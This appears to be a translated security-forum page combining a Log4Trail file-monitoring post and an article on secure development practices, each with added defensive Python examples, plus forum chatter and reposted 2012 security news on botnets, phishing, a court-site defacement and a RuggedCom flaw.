Log4Trail is also built for Windows, so it can be used to monitor what the users or employees in your company are doing with the computers on your network even when you are not connected to them over remote desktop. It can also be used to observe the behavior of malware that modifies files: reverse engineering is still the best way to analyze malware, but this at least gives you an idea of the malware's targets. On Windows, monitoring your C:\Windows folder and its subdirectories is also a good strategy because it contains important system files. If you maintain Microsoft Windows servers such as Windows Server 2003, Windows Server 2008, Windows HPC Server 2008, Windows Server 2008 R2 or Windows Server 2012, it is wise to monitor the files being shared, your file backups and your configuration files. Log4Trail can be minimized to the system tray by clicking the X button on the main form, and it continues monitoring your files and directories; to show the main form again, click the monitor-like icon in the system tray.
Log4Trail's scanning speed can be set to High, Normal (the default), Low or Paused, and it has Stop/Start buttons for interactive use. When the application starts it enters auto-scan mode and monitors whatever is configured in the File Manager, so once the File Manager is set up you do not need to configure anything else or repeat the process. Well, that's all, guys; I leave the rest to you.

References:
Log4Trail File Monitoring | #! Pir8Geek
InfoSec Resources – Using Log4Trail
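Log4Trail itself is a closed Java application, so as an added example (written for this page; it is not Log4Trail's code and not from pir8geek or The ProjectX Blog) here is the same mechanism in Python: a SHA-1 baseline of every monitored file kept in SQLite, the two directory recursion choices, and a scan that reports each change as a from-CS/to-CS pair in the style of the tray balloon. The web root, its files and the "intruder" edits are constructed inside demo(); the table layout and function names are this example's own assumptions.

```python
"""Minimal Log4Trail-style file integrity monitor (added example, not Log4Trail code)."""
import hashlib
import os
import sqlite3
import tempfile
import time


def sha1_of(path):
    """SHA-1 of a file, read in chunks so large files need not fit in memory."""
    digest = hashlib.sha1()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def expand(target, recurse_subdirs):
    """List the files a monitored path covers.

    A single file is monitored on its own. For a directory, recurse_subdirs=True
    descends into subdirectories ("Force recursion in subdirectories"), while
    False takes only the directory's own files ("Only recurse contents").
    """
    if os.path.isfile(target):
        return [target]
    files = []
    for root, dirs, names in os.walk(target):
        files.extend(os.path.join(root, name) for name in sorted(names))
        if not recurse_subdirs:
            dirs[:] = []  # tell os.walk not to descend any further
    return files


class Monitor:
    def __init__(self, db_path=":memory:"):  # assumed: in-memory DB for the demo
        self.db = sqlite3.connect(db_path)
        self.db.execute("CREATE TABLE IF NOT EXISTS baseline "
                        "(path TEXT PRIMARY KEY, sha1 TEXT NOT NULL, ts REAL NOT NULL)")
        self.targets = []  # (path, recurse_subdirs), like File Manager entries

    def add(self, path, recurse_subdirs=False):
        """Register a path and record the current checksum of every file it covers."""
        self.targets.append((path, recurse_subdirs))
        for f in expand(path, recurse_subdirs):
            self.db.execute("INSERT OR REPLACE INTO baseline VALUES (?, ?, ?)",
                            (f, sha1_of(f), time.time()))
        self.db.commit()

    def scan(self):
        """Re-hash every monitored file; return (path, from_cs, to_cs) per change.

        from_cs is None for a new file and to_cs is None for a deleted one.
        The baseline is updated so the next scan reports only fresh changes.
        """
        known = dict(self.db.execute("SELECT path, sha1 FROM baseline"))
        seen, changes = set(), []
        for path, recurse in self.targets:
            for f in expand(path, recurse):
                seen.add(f)
                current = sha1_of(f)
                if known.get(f) != current:
                    changes.append((f, known.get(f), current))
                    self.db.execute("INSERT OR REPLACE INTO baseline VALUES (?, ?, ?)",
                                    (f, current, time.time()))
        for f in sorted(set(known) - seen):  # file vanished since the baseline
            changes.append((f, known[f], None))
            self.db.execute("DELETE FROM baseline WHERE path = ?", (f,))
        self.db.commit()
        return changes


def alert_text(change):
    """Notification line in the style of the Log4Trail tray balloon."""
    path, from_cs, to_cs = change
    if from_cs is None:
        return f"{path} has been created (to CS {to_cs})"
    if to_cs is None:
        return f"{path} has been deleted (from CS {from_cs})"
    return f"{path} has been changed (from CS {from_cs} to CS {to_cs})"


def demo(recurse_subdirs=True):
    """Constructed scenario: a web root whose files an 'intruder' then edits.

    Returns the changes one scan reports after bot.txt and sub/index.php are
    modified. With recurse_subdirs=False the file under sub/ is not monitored,
    so only bot.txt is reported.
    """
    root = tempfile.mkdtemp(prefix="www_")
    os.mkdir(os.path.join(root, "sub"))
    bot = os.path.join(root, "bot.txt")
    index = os.path.join(root, "sub", "index.php")
    with open(bot, "w") as fh:
        fh.write("hello\n")
    with open(index, "w") as fh:
        fh.write("<?php echo 'ok'; ?>\n")

    mon = Monitor()
    mon.add(root, recurse_subdirs=recurse_subdirs)

    with open(bot, "a") as fh:        # the intruder appends to bot.txt ...
        fh.write("pwned\n")
    with open(index, "w") as fh:      # ... and replaces the site's index
        fh.write("<?php echo 'defaced'; ?>\n")
    return mon.scan()


if __name__ == "__main__":
    for change in demo():
        print(alert_text(change))
```

Two caveats a practitioner would want before relying on any polling monitor of this kind: a change that is made and reverted between two scans is invisible, so the scan interval bounds what you can detect; and an intruder with write access to the baseline database (or the monitor process) can simply rewrite the stored checksums, so the baseline and the alert log belong off-host or on read-only media, and the alerts should go out-of-band (the mailer, in Log4Trail's case) rather than only to the compromised machine's tray.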
-
In the February 2012 edition of Computer, a sidebar to an article on "Web Application Vulnerabilities" asks: "Why don't developers use secure coding practices?" [1] The sidebar offers the usual clichés, that programmers feel constrained by security practices, and suggests that additional education will correct the situation. Another proposed magic solution is to introduce a secure development process. However, moving from the current development process to a more secure one, whether through better security education or a new process, requires a plan that connects the two, as the cartoon suggests.

Instead of looking for a single solution, another approach is to identify the threat agents, threats, vulnerabilities and exposures, and then establish a cost-effective security policy that provides safeguards against them. Many view programmers as the primary threat agent in a development environment; however, Microsoft reports that more than 50% of the security defects reported were introduced in the design of a component [2]. Microsoft's finding suggests that designers as well as programmers are threat agents, so it is appropriate to treat all of the software development roles (analysts, designers, programmers, testers) as potential threat agents. Viewing developers as threat agents does not imply that the individuals in these roles are careless or criminal, but they have the greatest opportunity to introduce source code that compromises the confidentiality, integrity or availability of a computer system. Developers can expose assets accidentally by introducing a defect. Defects have many causes, such as oversight or lack of experience with a programming language, and are a normal part of the development process.
Quality Assurance (QA) practices, such as inspections and unit testing, focus on eliminating defects from the delivered software. Developers can also expose assets intentionally by introducing malicious functionality [3], which can take the form of worms, Trojans, salami fraud and other attacks [4]. A salami fraud is an attack in which the perpetrators take a small amount of an asset at a time, as in the "collect the round-off" scam [5]. An individual intent on introducing illicit functionality will exploit any available vulnerability. Identifying all of the potential exposures and creating safeguards is a significant challenge for security analysts, but by analyzing the development process it is possible to identify a number of cost-effective safeguards.

To address these exposures, many researchers recommend enhancing an organization's QA program. One frequent recommendation is to expand the inspection practice with a checklist for the exposures created by each programming language the developers use [2]. Items on a security inspection checklist typically include constructs such as BASIC's Peek() and Poke() functions, C's string copy functions, exception handling routines, and programs executing at a privileged level [2]. Peek() and Poke() make it easy for a programmer to access memory outside the program, but a character array or table without bounds checking produces the same result. A limitation of language-specific inspection checklists is that every language used in the application needs its own checklist; for some web applications that means three or more checklists, and even then they may not cover all of the vulnerabilities.
Static analyzers, such as those evaluated by the SAMATE project sponsored by the National Institute of Standards and Technology (NIST), automate some of the objectives of an inspection checklist, but static analyzers have a reputation for flagging source statements that are not actually problems [6]. A rigorous inspection process used as a safeguard will identify many defects, but it does not adequately protect against malicious functionality. An inspection that occurs before the source code is placed under configuration control leaves a substantial exposure: the developer simply adds the malicious functionality after the source code passes inspection, or gives the inspection team a listing that does not contain it. Figure 1 illustrates a traditional unit-level development process containing this vulnerability.

As shown in Figure 1, a developer receives a change authorization to begin modifying or implementing a software unit. Generally the "authorization" is verbal, and the only record of it appears on the developer's progress report or the supervisor's project plan. To ensure that another developer does not update the same component, the developer "reserves" the necessary source modules. Next, the developer modifies the source code to add the required features. When the changes are complete, the developer informs the supervisor, who assembles a review panel of 3 to 5 senior developers and/or designers. The panel examines the source code to evaluate its logic and documentation, and can recommend major changes that require another review, minor changes that do not require a full review, or no changes and no further review.
It is at this point in the process that the source code is most vulnerable to the introduction of malicious functionality, because there are no reviews or checks between the review and the moment the software is "checked in". Another limitation of inspections is that the emerging Agile methodologies do not recommend formal inspections: eXtreme Programming uses pair programming and test-first development in lieu of inspections, and Scrum relies on unit testing for defect identification [7, 8]. Using inspections as the primary safeguard against development exposures limits the cost savings promised by these methodologies and still does not fully protect against a developer who wishes to introduce malicious software.

Programming languages and the development process offer a number of opportunities to expose assets, and many of the tools, such as debuggers and integrated development environments, can expose an asset to unauthorized access as well. Many development tools run at the same protection level as the operating system kernel and would serve quite nicely as a vehicle for depositing a rootkit or other malicious software. Another potential exposure, unrelated to programming languages, is the use of "production" data for testing; it may give developers access to information they have no need to know.

Only a comprehensive security policy covering personnel, operations and configuration management can provide the safeguards needed to secure an organization's assets. Many organizations already conduct background checks, credit checks and drug tests when hiring as part of their security policy. Security clearances issued by government agencies have fixed terms; non-governmental organizations should likewise re-screen development personnel periodically. Some would argue that random drug tests and periodic security screenings are intrusive, and they are.
However, developers need to understand that just as an organization locks its doors to protect physical property, it needs periodic security screenings to protect intellectual property and financial assets from the people with the greatest access to them.

Another element of a robust development security policy is to keep development and production systems separate. Developing software in the production environment exposes organizational assets to a number of threats, from debugging tools to simply writing a program that reads information stored on the system without authorization. Recent publicity around the STUXNET worm suggests that a robust development security policy will also prohibit external media such as CDs, DVDs and USB devices [9]. Another important point about STUXNET is that it targeted a development tool, and the tool is what introduced the malicious functionality.

Configuration management is the traditional technique for controlling the content of deliverable components and is an essential element of a robust security policy [10]. Of the six areas of configuration management, the two with the greatest effect on security are configuration control and configuration audits. Version control tools such as ClearCase and CVS provide many of the features required for configuration control. A configuration audit is an inspection that occurs after all work on a configuration item is complete and verifies that all of the physical elements and process artifacts of the item are in order. Version control tools prevent two or more programmers from overwriting each other's changes, but most of them permit anyone with authorized access to check source code "in" and "out" without an authorized change request, and some do not even track the last access to a source module.
In a secure environment, however, the version control system must integrate with the defect tracking system and record the identity of every developer who accessed a specific source module. Integrating the two permits only the developer assigned to a specified change to check out the related source code. Tracking who reads the source is equally important: developers frequently copy code from a tested component, or study how another developer addressed an issue, and so need read access to modules they are not maintaining. The same access is a convenient research tool for someone planning to introduce malicious functionality into another module. By logging source module access, security personnel can monitor who is reading what.

Configuration audits are the second management technique that makes a development organization more secure. Audits range in formality from a clerk using a checklist to verify that all of the artifacts required for a configuration item have been submitted, to a multi-person team confirming that the delivered software produces the submitted artifacts and that the tests adequately address the risks posed by the item [11]. Some regulatory agencies require audits of safety-critical and high-reliability applications to provide an independent review of the delivered product. In a high-security environment, the audit addresses the need to assure that the delivered software does not expose organizational assets to risk from either defects or malicious functionality. The artifacts submitted with a configuration item can include, but are not limited to, the requirements or change requests implemented, the design specification, the test scripts, the test data, the test results and the source code of the configuration item.
To increase confidence that the delivered software contains neither defects nor malicious functionality, auditors should verify that the test cases provide 100% coverage of the delivered source code. This is particularly important with interpreted languages such as Python and other scripting languages, because a defect can allow a remote user of the software to inject code. Another way for auditors to confirm coverage is to re-run the configuration item against the same test data and check that the results match those recorded during verification and validation.

Adopting these recommendations for a stronger configuration management process changes the typical unit-level development process of Figure 1 into the more secure process illustrated in Figure 2. In the more secure process, a formal change authorization is generated by the defect tracking system or by the version control system's own change authorization function. Next, the specified developer makes the changes required by the authorization. After implementing and testing them, the developer checks all of the artifacts (source code, test drivers and results) into the version control system, and the check-in automatically triggers a configuration audit of those artifacts. Auditors may accept the changes or create a new work order for further changes. Unlike the review panel, the auditors may re-test the software to confirm adequate coverage and that the test results match those checked in with the source code. This change to the development process significantly reduces the exposure to accidental defects and malicious functionality, because what is verified, together with all of its supporting documentation, is the source code deployed in the final product. Following all of these recommendations will not guarantee the security of the software development environment.
That is because there are always new vulnerabilities, including those opened up by social engineering. However, recurring security checks, separating developers from production systems and data, controlling media, and rigorous configuration management practices should make penetration of your information security perimeter more difficult. It is also necessary to review development tools and configuration management practices periodically, because threat agents adapt to any safeguard that does not keep up with new technology.

References:
[1] N. Antunes and M. Vieira, "Defending against Web Application Vulnerabilities," Computer, vol. 45, pp. 66-72, 2012.
[2] N. Davis, W. Humphrey, S. T. R. Jr., G. Zibulski, and G. McGraw, "Processes for Producing Secure Software: Summary of US National Cybersecurity Summit Subgroup Report," IEEE Security and Privacy, vol. 2, pp. 18-25, 2004.
[3] G. McGraw and G. Morrisett, "Attacking Malicious Code: A Report to the Infosec Research Council," IEEE Software, vol. 17, pp. 33-41, Sept.-Oct. 2000.
[4] M. E. Kabay, "A Brief History of Computer Crime: An Introduction for Students," 2008.
[5] M. E. Kabay, "Salami fraud," Network World Security Newsletter, 2002.
[6] SAMATE – Software Assurance Metrics And Tool Evaluation, NIST. Accessed Apr 14, 2012.
[7] K. Schwaber and M. Beedle, Agile Software Development with Scrum. Upper Saddle River, NJ: Prentice-Hall, 2002.
[8] K. Beck and C. Andres, Extreme Programming Explained: Embrace Change, 2nd ed. Addison-Wesley Professional, 2004.
[9] R. Langner, "Stuxnet: Dissecting a Cyberwarfare Weapon," IEEE Security & Privacy, pp. 49-51, 2011.
[10] A. Leon, A Guide to Software Configuration Management. Artech House, 2000.
[11] N. R. Nielsen, "Computers, security, and the audit function," Proceedings of the National Computer Conference and Exposition, Anaheim, California, May 19-22, 1975.
[12] InfoSec Institute Resources
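The gate at the heart of the "more secure process" (a check-in accepted only under an open work order that assigns that developer to the touched modules, every access logged for security review, and a configuration audit triggered only when the required artifacts are present) is easy to prototype. The following is an added example written for this page, not code from the article or from any version control product; the CR-nnn identifier format, the WorkOrder fields, the required-artifact set and the sample check-ins in demo() are assumptions. In a real deployment the same checks would run inside a server-side hook (git's update hook, for instance) fed from the defect tracker.

```python
"""Change-authorization gate for source check-ins (added example, not the article's code)."""
import re
from dataclasses import dataclass, field

# Assumed convention: a check-in message cites its change request as CR-<number>.
CHANGE_REQUEST_RE = re.compile(r"\bCR-\d+\b")

# Artifacts a configuration item must carry before a configuration audit can start:
# the source, the test driver/script and the test results named in the text.
REQUIRED_ARTIFACTS = {"source", "test_script", "test_results"}


@dataclass(frozen=True)
class WorkOrder:
    ident: str
    developer: str      # the one person authorized to change these modules
    modules: frozenset  # source modules the order covers
    status: str         # "open" or "closed"


@dataclass
class ChangeGate:
    """Server-side gate between the developer and the version control system."""
    orders: dict                                    # ident -> WorkOrder, from the tracker
    access_log: list = field(default_factory=list)  # every access, for security review

    def _log(self, developer, action, target, outcome):
        self.access_log.append((developer, action, target, outcome))

    def read(self, developer, module):
        """Reads are allowed (developers copy and study other modules) but recorded."""
        self._log(developer, "read", module, "allowed")
        return True

    def _reject(self, developer, modules, reason):
        for m in modules:
            self._log(developer, "check_in", m, "rejected: " + reason)
        return False, reason

    def check_in(self, developer, message, modules, artifacts):
        """Return (accepted, reason); every attempt leaves entries in access_log."""
        ids = CHANGE_REQUEST_RE.findall(message)
        if len(ids) != 1:
            return self._reject(developer, modules, "message must cite exactly one change request")
        order = self.orders.get(ids[0])
        if order is None or order.status != "open":
            return self._reject(developer, modules, f"{ids[0]} is not an open work order")
        if order.developer != developer:
            return self._reject(developer, modules,
                                f"{ids[0]} is assigned to {order.developer}, not {developer}")
        uncovered = set(modules) - order.modules
        if uncovered:
            return self._reject(developer, modules,
                                f"not covered by {ids[0]}: " + ", ".join(sorted(uncovered)))
        missing = REQUIRED_ARTIFACTS - set(artifacts)
        if missing:
            return self._reject(developer, modules, "missing artifacts: " + ", ".join(sorted(missing)))
        for m in modules:
            self._log(developer, "check_in", m, "accepted: " + ids[0])
        return True, f"accepted under {ids[0]}; configuration audit queued"


def demo():
    """Constructed scenario with one open and one closed work order."""
    gate = ChangeGate(orders={
        "CR-101": WorkOrder("CR-101", "alice", frozenset({"auth/login.c", "auth/login_test.c"}), "open"),
        "CR-090": WorkOrder("CR-090", "bob", frozenset({"billing/roundoff.c"}), "closed"),
    })
    full = {"source": "login.c", "test_script": "login_test.c", "test_results": "login.log"}
    results = [
        # assigned developer, covered modules, all artifacts: accepted
        gate.check_in("alice", "CR-101 fix null check", ["auth/login.c", "auth/login_test.c"], full),
        # same order, but a module the order does not cover: rejected
        gate.check_in("alice", "CR-101 also tweak rounding", ["auth/login.c", "billing/roundoff.c"], full),
        # work under a closed order: rejected
        gate.check_in("bob", "CR-090 one more change", ["billing/roundoff.c"], full),
        # no change request cited at all: rejected
        gate.check_in("alice", "quick fix", ["auth/login.c"], full),
        # not the developer the order is assigned to: rejected
        gate.check_in("bob", "CR-101 helping out", ["auth/login.c"], full),
    ]
    gate.read("bob", "auth/login.c")  # allowed, but it shows up in the log
    return gate, results


if __name__ == "__main__":
    gate, results = demo()
    for accepted, reason in results:
        print("ACCEPT" if accepted else "REJECT", reason)
    for entry in gate.access_log:
        print(entry)
```

The gate is only as strong as its placement: it has to run on the repository server where developers cannot skip it or rewrite history behind it, and the access log has to be written somewhere the developers being monitored cannot edit, otherwise the salami-fraud author from earlier in the article simply deletes the evidence along with the review.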
-
It would have been nicer to publish the source; maybe some people don't want to be "limited" to your server, to have others see their data, etc. Otherwise, watch out for "vulnerabilities", even if you keep logs... the smart guys can delete them once they get access, before you realize they were on your server.
-
So... we lost our host. We were notified only about 2 hours in advance. I backed up the whole platform except for the users' files... the accounts and everything are intact, as before the "shutdown"... but the users no longer have their stored files... there were over 100 GB in total, and we didn't manage to back them up in time. The public share and the public files we did manage to copy... but now, even if we reopened it, all the users would lose their files... Would you still want to use it even if you lose your files?
-
And if they're blondes too... it's a deluge!
-
It has been over a month since the spam-spewing Grum botnet was shut down, but spam experts say there has been no noticeable impact on global spam volume. Security researchers from FireEye worked with Internet service providers in Russia, the Netherlands and Panama to shut down the command-and-control servers controlling the Grum botnet; the last server, in Ukraine, was shut down on July 18. Symantec researchers at the time estimated that Grum was responsible for one-third of all spam sent worldwide, and its takedown led to an immediate drop in global spam volume of as much as 15 to 20 percent, according to July's Symantec Intelligence Report. The drop was only temporary, though: in the days since, global volumes have been creeping back up, Eric Park, an Abuse Desk Analyst at Symantec, told SecurityWeek. In fact, if the present trend continues, August may wind up with a higher global spam volume than July, Park said. According to Symantec's July report, the global spam rate was 67.6 percent (1 in 1.48 emails was flagged as spam), a 0.8 percentage point increase over June. There has been "minimal to no change" in spam as a result of the Grum takedown, Park said.

While Grum had an estimated hundred thousand zombies sending spam, those machines were likely blocked for sending email too frequently or wound up on IP blacklists, said Andrew Conway, a Cloudmark researcher. IP filtering is fast and cheap, and a good first line of defense against spam, Conway said. Grum spam was easy to blacklist, and despite its size, most spam from the botnet probably never reached user inboxes. Even in the heyday of spam botnets, between 2007 and 2010, Grum was "a distant sixth" in size and in the amount of spam generated, Mary Landesman, a senior security researcher at Cloudmark, told SecurityWeek.
Rustock, shut down in 2011, had 150,000 bots and sent out 30 billion messages per day at its peak, compared to Grum with a mere 50,000 bots and only 2 billion spam messages per day, Landesman said. The big players, such as Storm, Rustock and Srizbi, are no longer in action, which left Cutwail, Bobax and Grum as the "top 3" spam botnets. Cutwail and Bobax have been up and down over the past two years and have not had much impact, making Grum appear to be a larger player in botnet-driven spam than it really was, Landesman pointed out. Considering that users never saw Grum-delivered spam to begin with, the lack of impact is not surprising, Landesman said.

Global spam has actually been declining since 2008. Symantec's Park ran some numbers: a month before McColo was shut down in 2008, global spam volume was 5.8 trillion messages. In June 2008, when it was shut down, spam volume was 3.1 trillion, and a month later it had dropped further to 2.5 trillion. The numbers crept up a bit after that; a month before the Bredolab botnet and the Spamit affiliates were knocked offline in 2010, total spam volume was 3.8 trillion. In October 2010, once those operations were down, spam volume was 2.9 trillion, and it dropped to 2.4 trillion a month later. By the time Microsoft focused on the Rustock botnet, global spam volume was a shadow of what it had been before McColo's demise: a month before Rustock's shutdown, spam volume was 1.6 trillion. It dropped to 1.3 trillion in March 2011, when authorities seized the C&C servers, and slid to 1.2 trillion a month later. Each botnet shutdown has had less impact on global spam volume than the one before, Park pointed out. While the percentages look impressive (spam declined 57 percent after McColo, 37 percent after Bredolab and Spamit, and 25 percent after Rustock), the absolute drops are getting smaller, Park said.
While Park did not have global spam volume figures for the current month at hand, he noted that daily global spam volume was about 25 billion in mid-June, a month before Grum's last C&C server was turned off on July 18. The number dropped to about 12 to 15 billion between July 18 and July 22, Park said, and from Aug. 9 through Aug. 13 daily spam volume was consistently over 50 billion. The recovery from the post-takedown drop was surprisingly quick, Park said. The numbers differ, but spam volume figures from other companies tell the same story. AppRiver saw spam volumes recover within a week to the levels observed in June, Troy Gill, a security analyst with AppRiver, told SecurityWeek. "We do not currently see any signs of a comeback from the Grum botnet, yet traffic remains equal to the rates we were seeing before the takedown," Gill said.

It is also important to note that spammers have turned away from very large botnets in favor of smaller, more focused and presumably more easily managed ones, Landesman said. This means there are more botnets, each with less individual impact, while the total effect on global spam volume stays about the same. The spam-delivery market is "very fluid," Gunter Ollmann, vice-president of research at Damballa, told SecurityWeek. Multiple "suppliers" offer medium-to-large botnets for spam campaigns, and operators tend to "subscribe" to several suppliers, Ollmann said. As a result, "takedowns of an individual supplier can be counteracted within a day or two," he said. Symantec's Park also felt that spammers have learned from previous takedowns and diversified their infrastructure. Instead of one large botnet for all their needs, they run multiple networks, one for fake pharmaceuticals, one for online gambling, and so on, which makes it easy to stay in business after any single takedown.
They have learned "not to put all their eggs in one basket," Park said. The Grum takedown still has important implications from a law enforcement standpoint, because raising the cost of doing business can deter future operations, Park and Landesman agreed. However, it is also worth considering the dissenting opinion that the takedown did nothing to stop the criminals and may actually have done some harm, Ollmann said. "The 'takedown' was ineffectual," Ollmann said: it shut down servers but did nothing to stop the techniques the operators had used to infect victims and build the botnet in the first place, nor did it result in the arrest of the actual criminals. In fact, the "ill-conceived takedown" alerted the operators to some of the mistakes the Grum team had made that allowed researchers to track them, which means it will be even harder to build evidence against these spammers in the future, Ollmann said. Such actions have simply caused "the bot masters to improve their botnets and further insulate themselves from the errors that allow more strategic law enforcement operations to be successful," Ollmann said. Source
-
Cybercrime Crackdown Yields 357 Arrests in Philippines
On Thursday, law enforcement officials from the Criminal Investigation and Detection Group (CIDG) and the Presidential Anti-Organized Crime Commission (PAOCC) in the Philippines arrested more than 300 people in a cybercrime sweep. The arrests took place across several subdivisions, and the operation is being hailed as the biggest cybercrime operation in the nation's history. According to a CIDG press release, the two agencies arrested 357 foreign nationals, mostly Taiwanese and Mainland Chinese, when they raided 20 residential units in subdivisions located in Quezon City, Manila, Marikina, Cainta and Antipolo. The sweep was aimed at stopping a scam that originated in China: the group would call unsuspecting victims in China and introduce themselves as members of the Chinese police. The victim would then be told that their bank accounts were being used to launder money or fund terrorism, and be advised to move their funds to a "safe" account provided by the police. Given that no one wanted to upset the police, many of the victims agreed immediately. A similar scam was broken up in China earlier this year, when Chinese authorities arrested 37 people. To keep the operation going, those who remained free moved outside the country's borders and established a new base of operations. Among those arrested on Thursday are two people thought to be the ringleaders of the scam, identified as Maria Luisa Tan and Jonson Tan Co. All the suspects were taken to the Police National Training Institute (PNTI) in Camp Vicente Lim, Laguna, the CIDG statement said. All 357 are presently being held while charges for violation of the Access Device Act are compiled. Source
Cybercriminals Target Blackberry Users in Phishing Campaign

Security researchers from Websense have discovered a new malware campaign targeting BlackBerry customers. The malicious emails claim that the recipient has successfully created a BlackBerry ID and attempt to infect the system through a malicious attachment: "To enjoy the full benefits of your BlackBerry ID, please follow the instructions in the attached file," the email reads. As Websense notes, the email text is copied and pasted from the legitimate email BlackBerry sends when someone signs up for a BlackBerry ID. According to Websense, if the attachment is run it drops further executable files and modifies the system registry so that the malware programs are launched automatically when the system boots. At the time of publishing, only 27 of 42 anti-virus engines on VirusTotal identified the malware. Source
-
Russian court Web site defaced over Pussy Riot verdict
A group claiming to be associated with Anonymous has taken responsibility for the attack. A Russian court Web site has been defaced following the verdict that saw the members of the all-female punk-rock band Pussy Riot sentenced to two years in jail. The Khamovnichesky District Court site was hacked today by a group claiming to be affiliated with the U.S. branch of Anonymous, which uploaded a message in Russian saying that it doesn't "forget" or "forgive." The group also posted a Pussy Riot song, "Putin Is Lighting the Fires of the Revolution," and a video of the Bulgarian singer Aziz. The BBC was first to report the news. Pussy Riot band members were arrested in March after performing a "punk prayer" in Moscow's main cathedral, asking the Virgin Mary to save Russia from President Vladimir Putin. A judge last week sentenced all three band members to two years in prison for their act of dissent. Their arrest and trial has lit a firestorm across the world over individual rights in Russia, and many "hacktivist" groups have come out in support of the band. One such group, Anti Leaks, took down the Russian news site RT.com with a DDoS attack last week. The band members were found guilty of "hooliganism motivated by religious hatred." Source
The U.S. Department of Homeland Security is probing Siemens technology that may allow hackers to attack critical infrastructure, such as power plants. The DHS has issued an alert warning that hackers could exploit code in Siemens-owned technology to attack power plants and other national critical infrastructure. Security researcher Justin Clarke exposed the flaw at a Los Angeles conference last week, saying he had found a way to spy on encrypted traffic to hardware made by a Siemens subsidiary, RuggedCom. The DHS advisory noted: "An attacker may use the key to create malicious communication to a RuggedCom network device." DHS added that it was in contact with RuggedCom and the researcher to identify the flaw and find a resolution. Clarke said the Siemens-owned equipment maker used a single software key to decode encrypted traffic flowing across its network, and that he had discovered a way to extract the key, which could then be used to send malware or credentials to the critical systems. "If you can get to the inside, there is almost no authentication, there are almost no checks and balances to stop you," Clarke said, Reuters reports. According to the BBC, this is the second time Clarke has reported a flaw in RuggedCom's technology after purchasing the firm's equipment second-hand on eBay; RuggedCom updated its software after Clarke found the first "backdoor", which would have allowed hackers to access equipment remotely with an easily extracted password. Though the risk of cyberattacks continues to plague governments around the world, there have been no reports of successful attacks on U.S. critical systems yet. Iran is known to have suffered from the Stuxnet malware, which caused physical damage to its nuclear facilities amid global concern that Tehran was building a nuclear bomb.
Similar malware, dubbed Flame, was described as the "most complex" cyberweapon ever discovered by Kaspersky Lab. Sursa
-
The Web titan is building a group dedicated to finding and solving "subtle, unusual, and emergent" problems with its products.

Google, which settled a privacy case with the U.S. Federal Trade Commission (FTC) last week, is building a "red team" dedicated to solving privacy problems. The team will be focused on tracking down and fixing privacy risks within the company's products, services, and business processes. Its existence came to light after Google posted a job advertisement seeking a "Data Privacy Engineer, Privacy Red Team". The advertisement says:

Kaspersky Lab's ThreatPost blog says that while the concept of a "red team" is far from new -- red teams have been used by companies for decades to identify and block methods of circumventing security systems -- Google's move to confront issues "that could involve user privacy risks is perhaps a unique one."

Google was recently hit with a $22.5 million fine by the FTC -- the largest it has ever issued for violation of one of its orders -- over charges that it "placed an advertising tracking cookie on the computers of Safari users who visited sites within Google's DoubleClick advertising network." The FTC found Google had automatically set the third-party cookies on Safari, despite the Apple browser being set up to reject such cookies by default.

Source
-
^ Petroșani, hmm, I'll be passing through there tomorrow, maybe a phone number or something?
-
// I reworded your post accordingly
-
jneboon? you sure found the right place to post..
-
It's open to interpretation, like the Constitution.. we're waiting for Ponta to "give clear directives so that everyone interprets it the right way". If the answer (the probability of picking a correct answer) has to be among the answers below, it's impossible, it's paradoxical. It's like the "liar's paradox", "this sentence is false": if it's true that it's false, then the statement would become true, but that would mean it's false, and if it's false, the sentence would be true, because it says that sentence is false..
